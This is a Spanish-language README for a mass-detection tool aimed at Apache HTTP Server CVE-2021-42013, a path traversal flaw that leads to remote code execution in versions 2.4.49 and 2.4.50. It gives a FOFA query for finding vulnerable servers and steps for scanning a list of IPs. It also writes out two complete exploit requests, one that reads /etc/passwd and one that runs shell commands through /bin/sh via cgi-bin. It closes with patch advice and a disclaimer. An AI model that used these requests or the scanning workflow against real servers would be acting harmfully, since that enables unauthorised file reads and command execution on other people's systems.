
Herramienta de detección masiva de ejecución remota de código en Apache (CVE-2021-42013): Apache HTTP Server es un servidor web de código abierto de la Apache Software Foundation. Se caracteriza por ser rápido, confiable y extensible a través de una API simple. Se descubrió que la corrección para CVE-2021-41773 en Apache HTTP Server 2.4.50 era insuficiente. Los atacantes pueden usar un ataque de path traversal para mapear URLs a archivos fuera de los directorios configurados por directivas similares a Alias. Si estos archivos fuera de dichos directorios no están protegidos por la configuración predeterminada habitual "Require all denied", estas solicitudes pueden tener éxito. Si además se habilitan scripts CGI para esas rutas de alias, esto podría permitir la ejecución remota de código. Este problema solo afecta a Apache 2.4.49 y Apache 2.4.50, no a versiones anteriores.
Apache ejecución remota de código (CVE-2021-42013)
Apache HTTP Server es un servidor web de código abierto de la Apache Software Foundation. Este servidor se caracteriza por ser rápido, fiable y ampliable a través de una API simple. Se descubrió que la corrección aplicada en Apache HTTP Server 2.4.50 para CVE-2021-41773 era insuficiente. Un atacante puede utilizar un ataque de path traversal para mapear URLs a archivos fuera de los directorios configurados por directivas como Alias. Si estos archivos fuera de dichos directorios no están protegidos por la configuración predeterminada 'Require all denied', estas solicitudes pueden tener éxito. Si además los scripts CGI están habilitados en esas rutas de alias, esto podría permitir la ejecución remota de código. Este problema solo afecta a Apache 2.4.49 y Apache 2.4.50, no a versiones anteriores.
Apache HTTP Server 2.4.49
Apache HTTP Server 2.4.50
server="Apache/2.4.49" || server="Apache/2.4.50"
1. Coloque las direcciones IP a analizar en el archivo ip.txt
2. Ejecute python3 check.py
GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1
Host: vuglfocus.fofa.so:55493
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZMSESSID=fcnisfo6rj1snid6e5r27kj1n0; zmSkin=classic
Connection: close
GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: vuglfocus.fofa.so:55493
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZMSESSID=fcnisfo6rj1snid6e5r27kj1n0; zmSkin=classic
Connection: close
Content-Length: 57
echo Content-Type: text/plain; echo;ls /

Actualmente, estas vulnerabilidades han sido parcheadas. Dada la gravedad de las vulnerabilidades, se recomienda que los usuarios afectados actualicen inmediatamente a Apache HTTP Server 2.4.51 (publicado el 7 de octubre) o una versión posterior.
Enlace de descarga:
https://httpd.apache.org/download.cgi#apache24
Esta herramienta se proporciona únicamente para que los profesionales de seguridad realicen autoevaluaciones. El autor no se hace responsable de cualquier uso indebido por parte de los usuarios. Los usuarios deben cumplir con las leyes locales. Este programa no debe ser utilizado con fines comerciales, solo para aprendizaje e intercambio.
